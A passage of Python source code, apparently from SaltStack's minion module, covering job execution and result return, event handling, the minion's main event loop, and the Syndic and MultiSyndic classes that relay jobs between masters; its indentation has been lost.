get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', ''):
executors[-1] = 'sudo.get'
# Get the last one that is function executor
executor = minion_instance.executors[
"{0}".format(executors.pop())](opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = minion_instance.executors["{0}".format(executor_name)](opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
try:
ret = channel.send(load)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event \'{0}\''.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return recieved with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
